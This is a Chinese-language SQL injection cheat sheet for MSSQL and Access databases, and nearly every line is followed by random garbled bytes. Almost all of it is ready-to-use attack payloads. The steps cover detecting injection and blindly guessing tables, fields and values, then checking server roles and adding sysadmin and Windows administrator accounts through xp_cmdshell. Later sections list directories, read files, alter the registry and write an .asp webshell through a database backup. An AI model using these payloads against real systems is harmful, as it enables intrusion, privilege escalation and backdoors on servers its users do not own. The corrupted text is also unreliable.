1.判断是否有注入;and 1=1 ;and 1=2 \&�U"�7gSL
2.初步判断是否是mssql ;and user>0 jpOcug`�f
YG)7��+9�4
3.注入参数是字符'and [查询条件] and ''=' ,��u!_�m�V
W)Y:�2P�<.
4.搜索时没过滤参数的'and [查询条件] and '%25'=' wo$ F�_!3u
2z1r�|?l�
5.判断数据库系统 Ik@M�IxLK�
1�F+nWc2�b
;and (select count(*) from sysobjects)>0 mssql woN
d7`C}7
Hq>�r���K`
;and (select count(*) from msysobjects)>0 access ���R�B�;2�
75�A6�0U�w
pK'�D�(��t
�Ye^�xV,U@
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Q��8h�=2YL
9�WHarv2�@
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ]�eX(K�5 A
rP/W,!
7:K
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 1��{
ehnH
q!q=a�xfMD
9.(1)猜字段的ascii值(access) w�(��i��c$
I;9DG8C&v*
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 JD�� AX�^]
�KqNsCT+j
(2)猜字段的ascii值(mssql) f917F.1��I
k�9c`[M���
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �Z'm( M[2K
|>�-0�q�~
10.测试权限结构(mssql) ~d�Le9-�_9
N�]GF>�kf:
cCIs~*�D�
d�bF9%I�@�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 5j _[z|W2
J`wx72/-ZW
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- U;g�y4rj�
k_Lv\'O�k�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �HD�z�"i�
9'K�Oc5@l^
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ��r�K�l���
:z$+leNH�\
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 8�P&z@E{y�
Qr?(�2�t#�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 0.1?hb|p5T
6�*I=%
H|�
;and 1=(select IS_MEMBER('db_owner'));-- ��t3!~�=�U
�nzU0=w�}V
�59?$9}o�b
H��Lh]*tQG
11.添加mssql和系统的帐户 ��l��vU�Ws
E��Se�$6)P
;exec master.dbo.sp_addlogin username;-- �RVpo,;�:�
;exec master.dbo.sp_password null,username,password;-- C4|79UG�>s
j��"&Oa&SH
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ,ZnL3�8�GW
lnV!Xu�f��
;exec master.dbo.xp_cmdshell 'net user username password cQ��0�+kX<
�Tcq@Q$��H
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �SWNT}�{x]
l�W]&a"1�$
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �ZZ>(o
d!B
u#3C�st8�Y
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- vQ��{mEaH�
)xT�u|�V��
R5<:3t�k=X
|lVi* 4za%
12.(1)遍历目录 vnX~O��Vz2
8=mx5Gwz�-
;create table dirs(paths varchar(100), id int) yQC�8�Gt8
jW}hLj�l�N
;insert dirs exec master.dbo.xp_dirtree 'c:\' CR-2�>,*a9
F5���\{`��
;and (select top 1 paths from dirs)>0 XZ/cREz^s
^5�-SL��?E
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) /)�r[}C0��
Pa�� �^_�s
ZrWA���,~;
�0EC/l�
OS
(2)遍历目录 V�j[,o
Vt$
i\{�fM}~W$
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- SqoO�"(1x
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 e�W[](lGWM
0'R���}'
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 AQ,%5Me�qJ
w X.]O!^X~
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 `�V�?NS,@$
"�)���W5`9
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 =�8�DS�~J{
O�q�95z�o�
�r�<"�k�
/
p�Acu{�5#7
13.mssql中的存储过程 �~B��`�H5#
*,wW�-��8
xp_regenumvalues 注册表根键, 子键 ��UR[UZ4G�
=AeO�ki��e
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 No]�#RvEd3
oCB#i~|>�a
xp_regread 根键,子键,键值名 w5a;t�s_x
<@qJ�sRbhK
;exec xp_regread �h9��+�7�6
Ia>~ph#]{`
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 :) �T#.(mR
w�gZ6|)!0�
xp_regwrite 根键,子键, 值名, 值类型, 值 �/��tq�e:*
$X�rX�(l5
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Y�,�X0x- �
�
e:6mz�\J
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 l��q)��[��
�cUU"*b�A#
xp_regdeletevalue 根键,子键,值名 7i9wfc h$U
�\}7xgQ>oV
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 4aG}ex-s|�
�GUsJF;�;V
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��.+-7 'ux
<�z{,�@Z�}
~�gOdK-SV*
6,skF^����
14.mssql的backup创建webshell QQUZn�eIDp
�2%j"�E{J&
use model h� ?+vH{}j
,u�S}wJ�AX
create table cmd(str image); F=$U.�K~1?
.c��_qMTm"
insert into cmd(str) values (''); Q_|��L��v&
.vpx@_;�]9
backup database model to disk='c:\l.asp'; LLw�C*�)�#
iMp_1EXe
�
C0�j`H(�
�k
i{8f��
15.mssql内置函数 }�yM!o`90
nkz^^q`5l7
;and (select @@version)>0 获得Windows的版本号 �S!7|vb*ko
\2)~dV:6+�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa =|q�@�Q`DB
P".�rm�0@R
;and (select user_name())>0 爆当前系统的连接用户 D;X/�7 p|>
4%� �2MY�\
;and (select db_name())>0 得到当前连接的数据库 ��dxF)) Z�
ImI,�q:[67
��$�`Aps7A
2��QV|NQSl
16.简洁的webshell �I�yt.`z��
!Bb^M3iA�
use model �n�gH_�p�>
�h=ko��_/<
create table cmd(str image); �^1[u'DW4�
�r���h6�m�
insert into cmd(str) values (''); �[u�/W�h�+
fMRMQR=6B�
backup database model to disk='g:\wwwtest\l.asp';
